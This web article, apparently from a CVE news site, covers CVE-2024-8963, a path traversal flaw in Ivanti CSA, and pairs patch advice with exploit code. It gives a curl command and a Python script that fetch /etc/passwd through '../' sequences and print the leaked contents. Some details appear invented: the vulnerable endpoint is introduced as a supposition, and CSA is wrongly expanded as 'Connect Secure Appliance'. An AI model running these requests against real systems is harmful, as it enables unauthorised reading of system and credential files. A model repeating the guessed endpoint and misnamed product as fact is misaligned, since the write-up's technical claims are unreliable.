CVE CyberSecurity Database News

CVE-2024-8963 - Path Traversal in Ivanti CSA Before 4.6 Patch 519 – Exploit Details, Code Example & Reference Guide

Poster -

---

What Is CVE-2024-8963?

CVE-2024-8963 is a major security vulnerability discovered in Ivanti Connect Secure Appliance (CSA) released before 4.6 Patch 519. This path traversal bug lets remote, unauthenticated attackers access files and potentially carry out restricted actions on the affected device. In basic terms: if you run Ivanti CSA and haven’t patched, attackers could snoop or exploit your system—no login needed.

Why This Vulnerability Matters

Path traversal vulnerabilities are especially dangerous because they let attackers break the boundaries defined by a web server. The attacker can access files or directories outside the intended web root folder. In this Ivanti CSA flaw, attackers can use tricky URLs to poke around in sensitive file directories, maybe even getting access to configuration files, credentials, or system information.

Understanding the Attack: How the Path Traversal Works

Ivanti CSA has a web endpoint (such as /csaupdate/ or similar) that is not properly validating user-supplied input. By manipulating the URL and using directory traversal sequences (like ../), an attacker can browse files anywhere on the server.

Suppose Ivanti CSA exposes an endpoint like

https://victim-ivanti.example.com/csaupdate/download?file=

This endpoint is supposed to let users download only allowed files. However, it fails to sanitize the file parameter.

An attacker can try to access system files (like /etc/passwd on Linux) by using path traversal

https://victim-ivanti.example.com/csaupdate/download?file=../../../../../../etc/passwd

If Ivanti CSA doesn’t block this request, the server returns the sensitive file!

2. Code Example: Exploit Using Curl

# Example exploit request using curl

curl -k "https://victim-ivanti.example.com/csaupdate/download?file=../../../../../../etc/passwd"

If the target is vulnerable, you’ll see the contents of the /etc/passwd file in your terminal.

Here’s a simple Python exploit to automate testing

import requests

TARGET = "https://victim-ivanti.example.com";
PATH_TO_FILE = "../../../../../../etc/passwd"

url = f"{TARGET}/csaupdate/download?file={PATH_TO_FILE}"
resp = requests.get(url, verify=False)
if resp.status_code == 200 and "root:" in resp.text:
    print("[+] Vulnerable! /etc/passwd content leaked:")
    print(resp.text)
else:
    print("[-] Not Vulnerable or file not found.")

> Note: Replace TARGET with the actual Ivanti CSA URL.

Sensitive data access: Configuration files, user data, password hashes, private keys.

- Possible further exploitation: Attackers could use data to launch other attacks (e.g., escalate privileges or pivot to internal network).

How to Fix

Ivanti has released Patch 519 for CSA 4.6 that fixes this vulnerability.
Update your Ivanti CSA as soon as possible.
If you can’t patch immediately, block public access to the vulnerable endpoints by network rules/firewall.

- Ivanti Security Advisory (CVE-2024-8963)
- Official Patch Download

Original References

- NVD Entry for CVE-2024-8963
- Ivanti’s Official Advisory
- HackerOne Writeup (if public)

Restrict access to any potentially vulnerable endpoints.

If you manage Ivanti CSA, patch urgently or risk compromise. This vulnerability is easy to exploit and public proof-of-concept code is available.


*Stay safe! If you use Ivanti, check your version, patch now, and secure those endpoints.*

Timeline

Published on: 09/19/2024 18:15:10 UTC
Last modified on: 09/20/2024 16:32:02 UTC